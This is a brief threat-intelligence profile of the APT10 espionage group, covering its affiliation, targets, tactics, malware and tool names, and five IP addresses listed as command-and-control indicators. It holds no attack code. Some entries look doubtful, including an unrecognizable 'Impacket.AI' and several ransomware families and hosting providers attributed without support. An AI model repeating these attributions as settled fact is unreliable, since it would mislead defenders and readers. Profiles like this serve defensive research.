APT10 is a Chinese state-sponsored cyber espionage group, active since at least 2009 and believed to be linked to the Chinese Ministry of State Security (MSS). The group is also known by aliases such as Stone Panda, MenuPass, Red Apollo, Cicada, Cloud Hopper, and POTASSIUM. APT10 is notorious for its large-scale, persistent campaigns targeting organizations worldwide for espionage and intellectual property theft.
Key Characteristics
• Affiliation: Chinese Ministry of State Security (MSS), specifically the Tianjin State Security Bureau.
• Primary Objectives: Espionage, theft of military and business secrets, and support of Chinese national security and economic interests.
• Active Since: At least 2009 (possibly as early as 2006).
• Target Sectors: Construction, engineering, aerospace, telecommunications, government, healthcare, technology, and managed service providers (MSPs).
• Geographic Reach: Six continents, with particular focus on the United States, Japan, Europe, and other regions.
Tactics, Techniques, and Tools
• Initial Access: Spearphishing (using .lnk files, double extensions, and decoy documents), and compromise of MSPs to pivot into client networks.
• Persistence: Long dwell times, use of “living off the land” techniques, DLL side-loading, and custom loaders.
• Malware Arsenal:
• HAYMAKER (ChChes/Scorpion)
• SNUGRIDE
• BUGJUICE (RedLeaves, overlaps with PlugX)
• QUASARRAT (xRAT)
• ScanBox, PlugX, RedLeaves, SODA Master, Uppercut, Hartip, Ecipekac, P8RAT, FYAnti, Impacket.AI, Rook, Pandora, AtomSilo, LockFile, Night Sky.
• Tools Used: certutil, AdFind, Cobalt Strike, Mimikatz, PowerShell, WMIExec, PsExec, and more.
• Techniques: Exploiting zero-day vulnerabilities, supply chain attacks, and use of legitimate administrative tools to evade detection.
Associated IP addresses
APT10 is known to use dynamic DNS services (like No-IP) and cloud hosting providers (such as Akamai and AS-CHOOPA) for command-and-control (C2) infrastructure, making their IP addresses highly volatile and often short-lived. Recent campaigns (2024–2025) attributed to APT10 (Earth Kasha) have also used infrastructure registered via providers like Namecheap and Tucows, with C2 servers often rotating IPs frequently to avoid blacklisting.
- 27.102.128.157
- 27.102.127.80
- 27.102.127.75
- 27.102.66.67
- 27.102.115.249